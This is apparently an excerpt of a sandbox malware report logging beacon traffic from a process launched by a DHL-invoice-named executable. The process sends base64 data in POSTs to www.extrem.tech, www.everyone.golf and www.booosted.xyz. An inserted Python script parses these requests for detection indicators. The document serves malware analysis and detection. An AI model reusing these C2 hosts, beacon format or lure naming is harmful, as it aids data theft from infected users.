                                                                                Data Raw: 59 38 69 3d 6f 49 55 77 4d 75 48 72 35 77 39 36 39 62 30 56 56 58 47 65 57 34 7a 6b 32 30 66 37 66 41 4f 6a 66 4b 6c 6f 78 34 6d 32 63 6f 78 59 32 62 4f 70 31 67 47 38 4c 79 79 38 72 42 4a 33 4a 44 32 45 75 4b 49 76 63 6f 75 61 41 65 71 52 65 76 2b 62 64 45 46 62 4e 45 57 38 30 38 78 43 72 65 76 48 72 69 6e 65 37 4e 7a 55 64 5a 72 38 4a 6f 4f 65 31 72 68 6c 57 6b 4d 67 69 76 43 72 4b 66 4b 30 41 48 65 4f 58 63 43 35 58 69 42 67 63 78 6c 4b 6f 75 4f 64 6d 74 6b 53 35 47 6d 70 4d 56 63 59 2f 37 2b 7a 47 63 67 51 65 35 42 51 6b 55 34 71 4a 4b 57 7a 4c 44 46 72 51 62 4e 4f 55 67 31 76 34 68 39 4e 67 36 44 30 61 6b 7a 4c 53 49 6c 75 5a 58 64 6b 45 30 45 3d
                                                                                Data Ascii: Y8i=oIUwMuHr5w969b0VVXGeW4zk20f7fAOjfKlox4m2coxY2bOp1gG8Lyy8rBJ3JD2EuKIvcouaAeqRev+bdEFbNEW808xCrevHrine7NzUdZr8JoOe1rhlWkMgivCrKfK0AHeOXcC5XiBgcxlKouOdmtkS5GmpMVcY/7+zGcgQe5BQkU4qJKWzLDFrQbNOUg1v4h9Ng6D0akzLSIluZXdkE0E=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                43 | 192.168.2.4 | 50051 | 13.248.169.48 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:39.346117020 CET | 10859 | OUT | POST /ikn1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.extrem.tech
                                                                                Origin: http://www.extrem.tech
                                                                                Referer: http://www.extrem.tech/ikn1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 49 55 77 4d 75 48 72 35 77 39 36 39 62 30 56 56 58 47 65 57 34 7a 6b 32 30 66 37 66 41 4f 6a 66 4b 6c 6f 78 34 6d 32 63 6f 35 59 32 75 61 70 31 47 4f 38 5a 69 79 38 77 42 4a 32 4a 44 33 47 75 4b 41 72 63 6f 6a 76 41 62 75 52 4d 38 6d 62 4b 42 78 62 61 30 57 38 70 73 78 44 76 65 76 57 72 6a 57 57 37 4e 6a 55 64 5a 72 38 4a 72 47 65 79 36 68 6c 46 55 4d 6e 6e 76 44 71 48 2f 4b 63 41 48 57 65 58 63 4f 48 58 54 68 67 63 52 31 4b 71 64 71 64 37 64 6b 51 36 47 6e 36 4d 56 41 54 2f 2f 57 56 47 59 68 48 65 36 64 51 70 69 39 70 51 4a 53 72 58 6a 68 4e 44 71 39 66 55 67 45 32 38 51 77 34 7a 76 50 37 4b 51 43 6a 4a 36 73 39 4c 6e 30 6b 51 53 37 43 57 5a 30 42 53 44 49 4f 7a 79 56 69 4a 67 4c 76 72 49 6d 56 46 73 67 71 51 58 6f 42 61 44 37 53 64 4a 32 31 45 58 55 46 59 33 69 4b 37 55 2b 72 6d 31 48 77 32 46 7a 42 61 52 31 4f 32 6f 69 64 53 49 4a 47 33 4a 32 47 6c 31 48 41 69 51 53 2f 72 74 39 34 39 33 62 6c 66 2b 36 6b 75 4d 52 74 39 68 6e 76 64 79 2f 58 41 69 39 61 75 46 47 53 41 45 44 67 69 4a [TRUNCATED]
                                                                                Data Ascii: Y8i=oIUwMuHr5w969b0VVXGeW4zk20f7fAOjfKlox4m2co5Y2uap1GO8Ziy8wBJ2JD3GuKArcojvAbuRM8mbKBxba0W8psxDvevWrjWW7NjUdZr8JrGey6hlFUMnnvDqH/KcAHWeXcOHXThgcR1Kqdqd7dkQ6Gn6MVAT//WVGYhHe6dQpi9pQJSrXjhNDq9fUgE28Qw4zvP7KQCjJ6s9Ln0kQS7CWZ0BSDIOzyViJgLvrImVFsgqQXoBaD7SdJ21EXUFY3iK7U+rm1Hw2FzBaR1O2oidSIJG3J2Gl1HAiQS/rt9493blf+6kuMRt9hnvdy/XAi9auFGSAEDgiJQCDBButHr/rlyM/V3TrS6uQWxZOtqo2RTr8A/NoR3ZbRLJYupxxruS32RseWDWFeyxfC0jZA32ND9auxrSymXUITMog7cpNoPs2LIVIQbxhGL6s4xTSE9Xa4qP8H5DWxYsU02e9z/G6QjeHoghtP6oWPxLDWWq8JErsmN/7l6K9qZA61x66c4XZFcMnggUhE0sFHjg9B1U5qUFuqxJlJJ6/XxCiIaUcKk8DBEc7eJy3rZd3fhL8Mi2TO58R81NrFGnNBky77YmeJsQ8OTX1XCg8dZzRL+jbaY/pdetJ+JnVdG6PMF1TLf8WDUvPKcSFeTT6RBnW6IWkRwUtWvPVhfbqMaK80MB4Rmd0PC9jvB3R7deHNaOK4d/4q6C7JfXPJ4BsXFwmTKD4pQjfzHGcBwLtNY+W9LuXytLKZA6P7DvNOw2y7SOgMcP8FeIGTiMW/hW9k8Ed3gVqeDZfhvfPQd/ebXV+YQk5V1nMwR4EDCQsvfsn6FPN44QZ/DfGSop2BZ1+IQWm8tD32O5HYgoHNTgU/oxQSDKqJ3kk8wQ6s82ghgocImlDL0ezmhjcPlC75kqOtY8fsz8nWfcSRbz37YCN3gG+ZN1o88VLkiXMHzjZCSwjyQXmwQIICzaDS67vOM/S4C/F66leFnhMe5mj3j8KxBwKIXCT1cj [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                44 | 192.168.2.4 | 50052 | 13.248.169.48 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:42.011009932 CET | 500 | OUT | GET /ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.extrem.tech
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:38:42.660067081 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:42 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 6c 4b 38 51 50 61 4c 6d 2f 7a 68 4b 71 4a 4d 59 4e 45 32 73 58 35 44 37 30 45 72 53 51 51 75 50 43 71 73 49 38 36 75 31 65 2f 78 43 73 2b 47 36 30 52 79 77 4c 58 43 4e 6e 45 5a 78 41 77 58 46 34 64 34 50 54 49 2f 36 59 49 53 42 4f 75 2b 53 43 68 30 37 4e 31 61 78 39 4a 59 41 37 71 7a 4e 78 6a 62 5a 33 37 6e 52 48 71 33 6a 49 6f 62 6e 39 5a 38 31 61 53 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM="}</script></head></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                45 | 192.168.2.4 | 50053 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:47.742291927 CET | 763 | OUT | POST /8hrm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.everyone.golf
                                                                                Origin: http://www.everyone.golf
                                                                                Referer: http://www.everyone.golf/8hrm/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 79 2b 61 74 50 49 6b 42 34 72 6e 44 72 4b 43 63 6d 2f 74 76 31 6c 7a 2f 72 54 64 6a 75 2b 70 59 77 62 72 4b 4b 69 6d 65 64 6a 52 31 55 66 52 79 37 39 58 4a 43 73 2b 45 69 61 32 2f 71 43 31 4f 47 52 69 43 37 6b 53 75 65 79 2f 5a 77 58 46 2b 63 6f 4c 75 4b 46 41 54 50 6b 47 76 48 2f 41 4f 6a 51 52 75 46 34 6d 30 55 76 63 64 5a 61 49 56 62 7a 4c 6a 39 53 49 41 73 6b 75 36 66 61 50 44 5a 45 53 52 47 4f 75 7a 75 77 48 75 33 49 56 32 5a 6d 39 54 79 58 78 55 53 62 53 79 5a 39 46 49 59 35 2f 6f 64 31 4a 72 65 77 4f 65 47 55 38 56 6b 72 39 33 57 2f 51 33 6a 38 6a 56 51 67 76 44 35 67 3d 3d
                                                                                Data Ascii: Y8i=y+atPIkB4rnDrKCcm/tv1lz/rTdju+pYwbrKKimedjR1UfRy79XJCs+Eia2/qC1OGRiC7kSuey/ZwXF+coLuKFATPkGvH/AOjQRuF4m0UvcdZaIVbzLj9SIAsku6faPDZESRGOuzuwHu3IV2Zm9TyXxUSbSyZ9FIY5/od1JrewOeGU8Vkr93W/Q3j8jVQgvD5g==


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                46 | 192.168.2.4 | 50054 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:50.290318012 CET | 783 | OUT | POST /8hrm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.everyone.golf
                                                                                Origin: http://www.everyone.golf
                                                                                Referer: http://www.everyone.golf/8hrm/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 79 2b 61 74 50 49 6b 42 34 72 6e 44 72 71 79 63 31 4a 6c 76 30 46 7a 38 6c 7a 64 6a 37 75 6f 52 77 62 6e 4b 4b 6d 2f 46 63 56 4a 31 56 36 31 79 70 49 33 4a 46 73 2b 45 37 71 32 41 6e 69 31 56 47 51 65 38 37 68 36 75 65 7a 66 5a 77 56 4e 2b 63 2f 33 74 4b 56 41 52 55 30 47 78 61 50 41 4f 6a 51 52 75 46 37 61 53 55 76 55 64 61 71 34 56 62 58 6e 67 6a 43 49 44 72 6b 75 36 62 61 50 35 5a 45 53 6a 47 4c 48 55 75 79 2f 75 33 4d 52 32 58 54 52 51 39 58 78 4f 50 72 54 48 64 63 30 59 53 4b 61 39 44 6e 35 70 51 41 65 4a 48 53 74 50 31 61 63 67 45 2f 30 45 2b 37 71 68 64 6a 53 4b 69 67 50 64 50 52 32 38 4c 76 39 34 43 63 42 4a 53 76 44 6b 44 64 6b 3d
                                                                                Data Ascii: Y8i=y+atPIkB4rnDrqyc1Jlv0Fz8lzdj7uoRwbnKKm/FcVJ1V61ypI3JFs+E7q2Ani1VGQe87h6uezfZwVN+c/3tKVARU0GxaPAOjQRuF7aSUvUdaq4VbXngjCIDrku6baP5ZESjGLHUuy/u3MR2XTRQ9XxOPrTHdc0YSKa9Dn5pQAeJHStP1acgE/0E+7qhdjSKigPdPR28Lv94CcBJSvDkDdk=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                47 | 192.168.2.4 | 50055 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:52.837548018 CET | 10865 | OUT | POST /8hrm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.everyone.golf
                                                                                Origin: http://www.everyone.golf
                                                                                Referer: http://www.everyone.golf/8hrm/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 79 2b 61 74 50 49 6b 42 34 72 6e 44 72 71 79 63 31 4a 6c 76 30 46 7a 38 6c 7a 64 6a 37 75 6f 52 77 62 6e 4b 4b 6d 2f 46 63 56 78 31 55 4d 70 79 34 5a 33 4a 45 73 2b 45 6b 61 32 46 6e 69 30 58 47 52 32 34 37 68 32 68 65 32 62 5a 71 32 56 2b 4d 62 6a 74 45 56 41 52 64 55 47 77 48 2f 41 68 6a 51 41 6e 46 34 79 53 55 76 55 64 61 6f 51 56 63 44 4c 67 68 43 49 41 73 6b 75 32 66 61 4f 57 5a 45 4b 5a 47 4c 4b 6a 75 42 33 75 33 73 42 32 61 42 4a 51 77 58 78 51 4f 72 54 66 64 63 35 43 53 4b 47 4c 44 6e 68 48 51 43 43 4a 45 33 63 47 75 37 67 43 66 38 70 59 73 4a 6e 43 45 78 54 47 36 52 2f 46 4d 44 2b 39 5a 50 4e 58 41 4d 41 63 50 4f 65 67 52 4b 57 67 63 4c 63 4f 6d 79 55 47 30 38 68 6a 74 72 61 36 54 79 32 53 36 6e 4e 33 6f 75 6d 33 2b 6c 6b 6b 4e 74 69 79 7a 47 59 6f 57 59 50 38 47 47 68 2b 4e 52 33 70 75 6a 62 68 73 67 64 68 6a 33 79 63 33 4b 6d 38 6a 46 2b 2b 38 6d 32 68 4a 74 2b 47 4d 66 31 7a 74 41 68 4d 38 74 4c 48 6e 56 66 61 46 7a 38 33 73 57 44 67 45 46 30 63 64 50 57 5a 4b 77 4a 6e 46 73 [TRUNCATED]
                                                                                Data Ascii: Y8i= [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                48 | 192.168.2.4 | 50056 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:38:55.381524086 CET | 502 | OUT | GET /8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.everyone.golf
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:38:58.940800905 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:58 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 38 69 3d 2f 38 79 4e 4d 39 77 47 7a 70 58 32 70 37 47 72 39 4f 4d 73 38 6b 33 4c 6b 69 74 38 6e 4d 49 39 6e 4b 54 54 4a 42 61 6c 66 6b 4d 66 48 36 78 7a 78 61 72 79 48 61 71 47 71 61 53 46 6d 6a 42 55 59 32 65 6a 33 78 32 68 52 46 76 46 68 48 56 75 43 50 72 42 50 69 49 4e 59 6b 66 4a 47 4f 59 59 78 79 59 6c 4c 64 69 69 52 39 35 6f 55 35 67 54 54 6d 37 69 6a 30 41 3d 26 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB"}</script></head></html>
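The sessions above show one process (PID 3604, rQkTBkrqhGpTBn.exe) working through a list of servers in the same rhythm: two short POSTs (Content-Length 200 and 220), one large POST (10300 bytes) and a GET, each carrying a single base64 field named Y8i, first to www.extrem.tech/ikn1/, then to www.everyone.golf/8hrm/, then to www.booosted.xyz/ndw1/, with each server answering a 260-byte page that only redirects to /lander. The Python below is an added example and is not part of the Joe Sandbox report or of any FormBook tooling. It parses requests of this shape and collects the indicators that can be read off this capture: the non-browser token FXM/0.2 trailing the Chrome-style User-Agent, the four-character path, the one long base64 field, and that field name being reused against unrelated hosts. The three sample requests are copied from this page with headers trimmed to the ones the script reads; the regexes, indicator names and the two-entry browser allowlist are assumptions of the example, tuned to this sample rather than to the family in general.

```python
"""Pull beacon indicators out of captured HTTP requests (added example, see
lead-in). Heuristics are read off the sessions on this page, not a spec."""
import base64
import re
from urllib.parse import urlsplit

# Constructed sample input: three requests copied from the sessions above,
# headers trimmed to the ones read here; bodies and query string verbatim.
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2")
SAMPLE_REQUESTS = [
    "POST /ikn1/ HTTP/1.1\r\nHost: www.extrem.tech\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 200\r\n"
    f"User-Agent: {UA}\r\n\r\n"
    "Y8i=oIUwMuHr5w96+6EVX0+eQYzn9Uf7VgPqfKpox9GmcdpY25Gp2iu8biy8hhJIND3puKUncp"
    "+aAeWRer6bdXdaC0Wy4cxAvevHrine7NmJdYD8JZ+e1KhkbEMnnvCrH/KwAHe8XZqXXh5g"
    "cxVKv8qSstl41Wm3Ikpd5ef6G+NwV71ghSpwY73kZDhYNcE6ZjImjg==",
    "GET /ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZx"
    "AwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM= HTTP/1.1\r\n"
    f"Host: www.extrem.tech\r\nUser-Agent: {UA}\r\n\r\n",
    "POST /8hrm/ HTTP/1.1\r\nHost: www.everyone.golf\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 200\r\n"
    f"User-Agent: {UA}\r\n\r\n"
    "Y8i=y+atPIkB4rnDrKCcm/tv1lz/rTdju+pYwbrKKimedjR1UfRy79XJCs+Eia2/qC1OGRiC7k"
    "Suey/ZwXF+coLuKFATPkGvH/AOjQRuF4m0UvcdZaIVbzLj9SIAsku6faPDZESRGOuzuwHu"
    "3IV2Zm9TyXxUSbSyZ9FIY5/od1JrewOeGU8Vkr93W/Q3j8jVQgvD5g==",
]

UA_SUFFIX_RE = re.compile(r"Safari/[\d.]+\s+(\S+)$")  # token trailing a Chrome UA
KNOWN_UA_SUFFIXES = ("Edg/", "OPR/")  # assumed allowlist: real browsers add a brand
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")  # /ikn1/, /8hrm/, /ndw1/ on this page
B64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")  # one long base64 value

def split_form(s):
    # Split k=v&k=v by hand: urllib's parse_qsl would turn '+' into ' ' and
    # silently corrupt the base64 payload.
    out = {}
    for pair in filter(None, s.split("&")):
        k, _, v = pair.partition("=")
        out[k] = v
    return out

def parse_request(raw):
    """Minimal HTTP/1.1 parser for one captured request (CRLF line endings)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path, "query": split_form(url.query),
            "host": headers.get("host", ""), "headers": headers,
            "body_raw": body, "body": split_form(body)}

def beacon_field(req):
    """(name, value) of the long base64 field the request carries, or None."""
    params = req["body"] if req["method"] == "POST" else req["query"]
    for k, v in params.items():
        if B64_RE.match(v):
            return k, v
    return None

def decoded_len(b64):
    """Byte length of a base64 blob, or None if it does not decode."""
    try:
        return len(base64.b64decode(b64, validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def assess(requests):
    """Group requests by host and collect the indicators each host shows."""
    per_host = {}
    for r in requests:
        rep = per_host.setdefault(r["host"], {"path": r["path"], "posts": 0, "gets": 0,
                                              "fields": set(), "ua_suffix": None, "indicators": set()})
        rep["posts" if r["method"] == "POST" else "gets"] += 1
        m = UA_SUFFIX_RE.search(r["headers"].get("user-agent", ""))
        if m and not m.group(1).startswith(KNOWN_UA_SUFFIXES):
            rep["ua_suffix"] = m.group(1)
            rep["indicators"].add("non-browser User-Agent suffix")
        if PATH_RE.match(r["path"]):
            rep["indicators"].add("short random path")
        bf = beacon_field(r)
        if bf and decoded_len(bf[1]) is not None:
            rep["fields"].add(bf[0])
            rep["indicators"].add("single base64 field in " + r["method"])
        cl = r["headers"].get("content-length")
        if cl is not None and int(cl) != len(r["body_raw"]):
            rep["indicators"].add("Content-Length mismatch")
    # One field name reused against several hosts ties the sessions together
    # as a single beacon rotating through its server list.
    if len(per_host) > 1:
        shared = set.intersection(*(h["fields"] for h in per_host.values()))
        for name in sorted(shared):
            for rep in per_host.values():
                rep["indicators"].add("field %s shared across %d hosts" % (name, len(per_host)))
    return per_host
```

Two practical points fall out of running it against the captured requests. First, the bodies are application/x-www-form-urlencoded only by header; a form decoder that maps `+` to a space (as `urllib.parse.parse_qsl` does) destroys the payload before any further analysis, so the form is split by hand. Second, base64-decoding the fields only establishes their sizes (145, 89 and 145 bytes for the three embedded samples); the report contains no key material, so the example stops there rather than guessing at a cipher.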


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                49 | 192.168.2.4 | 50057 | 3.33.130.190 | 80 | 3604 | C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 17, 2024 08:39:04.019942999 CET | 760 | OUT | POST /ndw1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.booosted.xyz
                                                                                Origin: http://www.booosted.xyz
                                                                                Referer: http://www.booosted.xyz/ndw1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2


                                                                                Session ID:50
                                                                                Source IP:192.168.2.4
                                                                                Source Port:50058
                                                                                Destination IP:3.33.130.190
                                                                                Destination Port:80
                                                                                PID:3604
                                                                                Process:C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Timestamp:Nov 17, 2024 08:39:06.562876940 CET
                                                                                Bytes transferred:780
                                                                                Direction:OUT
                                                                                Data:POST /ndw1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.booosted.xyz
                                                                                Origin: http://www.booosted.xyz
                                                                                Referer: http://www.booosted.xyz/ndw1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2


                                                                                Session ID:51
                                                                                Source IP:192.168.2.4
                                                                                Source Port:50059
                                                                                Destination IP:3.33.130.190
                                                                                Destination Port:80
                                                                                Timestamp:Nov 17, 2024 08:39:09.424566031 CET
                                                                                Bytes transferred:10862
                                                                                Direction:OUT
                                                                                Data:POST /ndw1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.booosted.xyz
                                                                                Origin: http://www.booosted.xyz
                                                                                Referer: http://www.booosted.xyz/ndw1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2


                                                                                Target ID:0
                                                                                Start time:02:35:00
                                                                                Start date:17/11/2024
                                                                                Path:C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe"
                                                                                Imagebase:0x2b47a1c0000
                                                                                File size:3'359'817 bytes
                                                                                MD5 hash:0DF139FA0F5D3A83ECFF651FDD692C68
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
